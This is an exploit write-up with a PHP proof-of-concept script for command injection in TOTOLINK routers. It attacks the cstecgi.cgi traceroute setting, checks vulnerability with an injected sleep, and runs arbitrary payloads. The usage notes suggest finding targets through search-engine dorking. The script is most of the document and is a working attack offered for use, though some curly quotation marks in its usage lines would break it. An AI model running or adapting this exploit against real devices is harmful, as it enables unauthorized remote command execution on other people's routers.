TOTOLINK 9.x Command Injection

=============================================================================================================================================
| # Title : TOTOLINK 9.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.totolink.net/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class TotolinkExploit {
private $targetUri;
private $sleepTime;

public function __construct($targetUri, $sleepTime = 3) {  
    $this->targetUri = $targetUri;  
    $this->sleepTime = $sleepTime;  
}

// Function to send POST request and execute the command on the target  
public function executeCommand($cmd) {  
    $num = rand(1, 500);  
    $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
    $data = json_encode([  
        "command" => "127.0.0.1; {$cmd};#",  
        "num" => $num,  
        "topicurl" => "setTracerouteCfg"  
    ]);

    // Send POST request  
    return $this->sendPostRequest($url, $data);  
}

// Check if the target is vulnerable  
public function check() {  
    echo "Checking if the target can be exploited.\n";

    // Test using echo command to see if it's vulnerable  
    $response = $this->executeCommand("echo test");  
    if (!$response || strpos($response, 'success') === false) {  
        return "Target is likely not vulnerable.\n";  
    }

    // Test command injection using sleep  
    echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
    $start = microtime(true);  
    $this->executeCommand("sleep {$this->sleepTime}");  
    $elapsedTime = microtime(true) - $start;

    echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
    if ($elapsedTime >= $this->sleepTime) {  
        return "Target is vulnerable: Blind command injection successful.\n";  
    }

    return "Command injection test failed.\n";  
}

// Exploit the vulnerability to run the payload  
public function exploit($payload) {  
    echo "Executing payload on the target.\n";  
    $this->executeCommand($payload);  
}

// Helper function to send POST requests  
private function sendPostRequest($url, $postFields) {  
    $options = [  
        'http' => [  
            'method' => 'POST',  
            'header' => 'Content-Type: application/x-www-form-urlencoded',  
            'content' => $postFields  
        ]  
    ];  
    $context = stream_context_create($options);  
    return file_get_contents($url, false, $context);  
}  

}

// Example of usage
$targetUri = 'http://target-ip’; // Replace with actual target URL
$exploit = new TotolinkExploit($targetUri);
echo $exploit->check();
$exploit->exploit(‘whoami’); // Replace with your payload

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================